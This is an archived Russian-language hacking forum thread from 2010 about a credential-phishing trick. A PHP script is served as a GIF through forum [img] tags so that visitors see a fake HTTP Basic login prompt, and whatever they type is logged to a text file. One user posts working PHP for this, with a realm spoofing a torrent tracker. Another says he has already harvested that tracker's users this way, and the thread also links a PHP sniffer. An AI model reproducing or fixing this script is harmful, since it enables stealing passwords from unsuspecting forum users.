PDA

Просмотр полной версии : GIF авторизация


SoftLive
21.01.2010, 00:13
Помню был такой прикол - GIF авторизация

и тут ссылка на картинку и когда вставлял то выходила авторизация, и записывалось в лог...

Кто может помочь найти?

Ponchik
21.01.2010, 00:23
google -> basic authentication

SoftLive
21.01.2010, 00:25
но мне нужен тот с фейком, который записывает пароли в .тхт... был бы оч рад если кто поможет, нужно срочно..

Помню был видео урок с ним, а уже удалили видео.античат.ру

TRX.new
21.01.2010, 00:28
но мне нужен тот с фейком, который записывает пароли в .тхт... был бы оч рад если кто поможет, нужно срочно..

Помню был видео урок с ним, а уже удалили видео.античат.ру

мне кажется это какие-то странные попытки описать php сниффер.. держи.. http://web-defence.ru/snif/ как вариант =)

Ponchik
21.01.2010, 00:29
header('WWW-Authenticate: Basic realm="Password Protected Area"');
header('Authorization: Basic');
логирование сам прикрути, 30 секунд :o

SoftLive
21.01.2010, 00:31
ВЫ не очень поняли наверно.

В общем была статья, что с тегом [img] можно было бы подставить картинку, и когда юзер заходит то выходит авторизация, и он вводит логин и пароль и они записываются в pass.txt к примеру.


И чтобы при заходе на smile.gif открывался пхп авторизация вот ))

Ponchik
21.01.2010, 00:32
Ну дай мне 2$ я тебе напишу :o

TRX.new
21.01.2010, 00:33
ВЫ не очень поняли наверно.

В общем была статья, что с тегом [img] можно было бы подставить картинку, и когда юзер заходит то выходит авторизация, и он вводит логин и пароль и они записываются в pass.txt к примеру.


И чтобы при заходе на smile.gif открывался пхп авторизация вот ))

ты имеешь ввиду внедрение PHP в gif .. многие фильтры такое уже не пропускают..

SoftLive
21.01.2010, 00:33
да на моём хостинге

Ponchik
21.01.2010, 00:34
TRX.new, ты непонел што он хочет
SoftLive, дай оцку

SoftLive
21.01.2010, 00:35
через .htaccess may bye..

<?
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif');
if(!$_COOKIE['LOGON'])
{
*$login = $_SERVER['PHP_AUTH_USER'];
*$pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
*{
* Header('HTTP/1.1 401 Unauthorized');
* Header('WWW-Authenticate: Basic realm="TORRENTSMD.COM"');
*}
*elseif($login)
*{
setcookie('LOGON',md5($pass));
$f = fopen('kizda.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
*}
}
imagegif($image);
imagedestroy($image);
?>

ВОт написал, но гдето ошибка, вернее в 6 линии, не пойму что не то

SoftLive
21.01.2010, 00:35
Только без звёзд)

TRX.new
21.01.2010, 00:37
TRX.new, ты непонел што он хочет
SoftLive, дай оцку

Объясни.. мне кажется .. он хочет дописать в конец gif файла рhp - авторизацию.

Ponchik
21.01.2010, 00:37
омг, ты с молдовы =\
я уже выжал трекер, врядле опять кто-то поведётся
и ещё тебя по IP пицданут, такчо потом не ной
Объясни.. мне кажется .. он хочет дописать в конец gif файла рhp - авторизацию.
нед, он хочет файл с basic авторизацией и вставлять его в [img] чоб на паге вылетала авторизация, а пассы писать в файл
через .htaccess may bye..
"may bye" = "май прощай"

Kusto
21.01.2010, 00:38
ВЫ не очень поняли наверно.

В общем была статья, что с тегом [img] можно было бы подставить картинку, и когда юзер заходит то выходит авторизация, и он вводит логин и пароль и они записываются в pass.txt к примеру.


И чтобы при заходе на smile.gif открывался пхп авторизация вот ))
последний раз когда я эту фигню по просьбе скидывал- какойто умник тут-же на античат ссыль и поставил, повелись пару человек, так что от выкладываний воздержусь

P.S. Дай Пончу пару баксов он те напишет, и еще чтоб когда второй раз страничку открываеш тоб не авторизация выскакивала а уже смайлик)))

SoftLive
21.01.2010, 00:39
Ponchik, земля)))

Да мне не только для ТМД))

Был бы рад если бы поделился правильным скриптаком, подкинул бы лавешки, да сейчас всё снял уже.. подкину плюсов

SoftLive
21.01.2010, 00:39
Если выложу на ачате сразу баньте, мне для локалки, и конечно не сюда а в приват скиньте лучше

TRX.new
21.01.2010, 00:40
омг, ты с молдовы =\
я уже выжал трекер, врядле опять кто-то поведётся
и ещё тебя по IP пицданут, такчо потом не ной

нед, он хочет файл с basic авторизацией и вставлять его в [img] чоб на паге вылетала авторизация, а пассы писать в файл

ЕЕ.. дошло.. благодарствую )

Ponchik
21.01.2010, 00:43
В молдове чуть более, чем все незнаю что такое вебмани :o
подкину плюсов
Ну ёпрст, если ты нуб в этом всём хоть не позорься млять!
с маем он просчается, плюсы ставить собирается
только цветные могут ставить плюсы

тебе скрипт дали (точнее ты его сам нащёл) ну и всё, не позорься, школота это не есть гуд

SoftLive
21.01.2010, 00:44
В молдове чуть более, чем все незнаю что такое вебмани :o

Ну ёпрст, если ты нуб в этом всём хоть не позорься млять!
с маем он просчается, плюсы ставить собирается
только цветные могут ставить плюсы

тебе скрипт дали (точнее ты его сам нащёл) ну и всё, не позорься, школота это не есть гуд

и в этом есть правда... Правда он не работает, был бы очень рад если бы помог, просто только плюсами то и могу помочь

Ponchik
21.01.2010, 00:49
тут был превад код, но нехер его на ачате юзать :mad:

Kusto
21.01.2010, 00:49
лан))) смотри личку- скину счас те жуткий приват))))

SoftLive
21.01.2010, 00:50
Спасибо всем огромное! Kusto, готов и твой вариант посмотреть, максимум что могу дать это плюсы, ну вы ребят извените, но вам огромный поклон!